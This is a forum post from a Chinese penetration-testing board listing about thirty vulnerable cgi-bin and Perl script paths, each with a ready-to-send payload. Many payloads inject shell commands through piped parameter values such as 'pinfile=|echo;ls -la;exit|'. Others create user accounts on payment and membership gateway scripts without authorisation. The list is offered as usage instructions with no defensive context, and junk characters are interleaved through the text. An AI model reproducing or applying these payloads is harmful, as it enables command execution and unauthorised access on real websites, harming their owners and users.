找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Cgi-bin 30个漏洞+使用方法
返回列表 发新帖
查看: 2888|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
: r" M* Y/ J4 r; n
& h& K' N8 W) e/ F% f0 U2 X$ u. b; T0 e4 |/smspass.pl
* h2 M: p* R2 E% `9 R& busername=username&password=password4 O, A" ?8 Z/ H9 G) z# D( l
0 Z# q# c: w9 a, L2 {7 p
/index.cgi
: e4 w. V: o- n" V4 P9 Y7 G# ewei=ren&gen=command, g/ @% {. P3 l# f4 A
/ |5 g' G2 C: Q# a
/passmaster.cgi1 F# h" `0 D# B7 M2 Z
Action=Add&Username=Username&Password=Password
4 P5 z6 G( b% Y+ g: v# l% J+ C. B. ]5 h- N% g/ i" j! u# `
/accountcreate.cgi
. D9 ~& q5 ^( p; Y. o" h5 Musername=username&password=password&ref1=|echo;ls|
- C% E9 e4 }& d/ R
# l/ Q7 v( F1 i/ j/form.cgi2 }; h5 z! d+ q9 @; V/ Y5 d: d% e% w
name=xxxx&email=email&subject=xxxx&response=|echo;ls|9 |$ |' i8 g, N( t9 h

8 ~9 h! h0 @0 v3 Q/addusr.pl. S: Q3 C9 Z9 u; |& i+ ^. T( }
/cgi-bin/EuroDebit/addusr.pl8 E9 A4 ~3 G- {, t- o. E* X: y! ?/ h
user=username&pass=Password&confirm=Password
+ {3 M0 Z$ V* v9 ]( V: J0 G7 z: J
! ]& C' S1 }4 C7 K3 B/ccbill-local.asp. n' L% ^$ r5 K1 x" l% N1 m
post_values=username:password2 L+ E. s9 k2 i& f9 y7 d

& n& B0 I4 @! _/count.cgi
7 D/ L% V3 j1 ^$ u7 W7 Z3 |3 b$ d: Vpinfile=|echo;ls -la;exit|
6 J' t& C+ _4 w- o8 T( c4 p/ u- y$ I* P. T
/recon.cgi
  |0 `' n& ~& D. @$ m& d/recon.cgi?search
) h. D" \9 D5 I& @% V! Usearchoption=1&searchfor=|echo;ls -al;exit|3 E% X: H3 R1 C! m2 j

" \3 Q0 ], a' ~, ~& X/verotelrum.pl
) z8 @; M# _3 e0 _- X/ y: y9 m& u0 Mvercode=username:password:dseegsow:add:amount<&30>0 O- @2 j5 ?1 N* Z

! ]& t& H0 l% O8 Z) Z2 Q: m- M9 I8 J/af.cgi  h% @7 f* A1 `) ?9 i# f5 q
_browser_out=|echo;ls -la;exit;|! f) a- V/ G) x+ H
$ X/ D& r6 J5 H+ ^
/modify.cgi
3 H# D3 B: D( {9 S; u8 Y9 Ausername=username&password=password&expire=30
9 ]( @( l) [  L3 ~) a1 Y- j5 z, }
/openjournal.cgi) Y. n  s. R0 d. }3 |/ x
edit=1&ct=2&go=|echo;ls -al;exit|6 O) R9 U2 t( f) I% H
1 c8 h$ y8 z1 \+ v) b4 _, t
/gx9passwd.cgi
7 l$ \0 D7 u; d( T1 E2 }cmd=ADD&user=username&pass=password
1 Y4 Y$ }- ^4 Z* I* h' ]8 V( S
3 P5 ^% k8 B6 L0 I. R- e; `/probecontrol.cgi! s; h7 \- O' x2 c5 M# g) E
command=enable&username=username&password=password
* w! H; H# B9 _- p/ J7 e: q
+ |) P" d0 f# B7 H! m. f) p9 f! D/recon.cgi8 k" O8 a0 ?( I5 a/ J& c
searchoption=3&searchfor=echo;ls -la;exit; U' z! I! j* P( e

* C3 P9 {- w6 l$ U/htadd.pl1 o2 M! `' K! n  M1 K2 _
configfile=|echo; ls -alt; exit
. C8 Q$ Y8 z7 m8 m' j3 k* B) k4 I; C4 J" g" Y+ y2 d2 R3 t
/gx9passwd.cgi& i: i% @/ W' q9 V/ X+ O+ u$ M! U
cmd=ADD&user=username&pass=password
5 ]* L' H7 ^+ c9 |2 w: B3 A, u: X& u8 F* w
/ibill*.pl9 {3 R, R- V0 p/ Y; r; A4 B( s
reqtype=add&authpwd=authpwd&username=username&password=password$ o2 r# P7 b. i9 l8 y! @
# f+ ~5 j4 g* ?4 Z6 K. z
/cpay.cgi
& c: d1 C5 F# k4 |# `# acommand=add_member&username=username(EMAIL)&password=password(DES)
3 r4 ^4 @7 X% i  x2 V: a3 t' S$ u7 g9 d" J! _' C
/globill_ut.cgi3 U- S5 o! D5 H" m$ a+ w( y* m
do=add&username=username&password=password&wpassword=password
5 k: h' E6 O8 i  F9 z* C2 x" {1 S# g$ B0 c/ z/ Y, d
/usercontrol.cgi
3 V5 w' ~+ Z: ]& rcommand=enable&username=USER&password=PASS6 W" w( }- Z) J, T/ C

; i8 p8 `: z1 O: I/globoSALErum.cgi
. Z$ @! D4 |" b! [action=ADD&seccode=seccode&login=username&password=password# p% p9 x: J8 F3 l7 Z7 [
! Y7 G4 I" N, Z. y1 \
/addusr.pl
* _! k1 q) `! g* i& t( Euser=USER&pass=PASS&confirm=PASS% A; \' N' C9 _$ |
* {! l! w$ A, f! c8 |: x+ p
/pincount.cgi
: y6 G2 _  `% v7 F9 ?4 t1 P- l/cgi-bin/mastergate/pincount.cgi
* B8 A; V& z  o* d0 w0 b. d# rpinfile=|echo;pwd;exit|+ C, g7 }* h. M4 c+ l; K
) C$ n3 d" d: W
/accountcreate.cgi/ C: y3 j; _: m: l7 R/ ]" ]7 U. y
/cgi-bin/gateway/accountcreate.cgi
# v: _) p" X* ?& K8 q3 }username=username&password=password&password2=password&ref1=|echo;ls -al;exit) s. ^) I* k7 c. l! M, i' O" |

. I# F* U0 \; `) q/af.cgi3 `) y: a( z* H" P2 \
/env.cgi! D5 o5 `. o. c
ADD+;echo;pwd;exit: O% M4 L6 z9 p, T" J" v
2 A6 s$ Y  c+ p7 f3 ?" S
/count.cgi* y0 u6 {8 r4 \
pinfile=|echo;pwd;exit|. O, b0 o8 k4 y& I( j7 C
1 n2 t/ `; i, t# b
/recon.cgi
( \3 }+ J' g4 w+ m; T) qsearchoption=1&searchfor=|echo;ls%20-al;exit|
9 Y4 J; P* U+ [0 v# |# [+ A! S5 Q" q7 G4 `  L% ~& E( P
/add.cgi) k& ?; z& O) C7 E( t: t
username=username&password=password&expire=30
* G) U" X' t. q. t) s/ ]3 ?9 n) P* d6 a' Z& a
==============================
0 t4 Y; R1 D( X
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表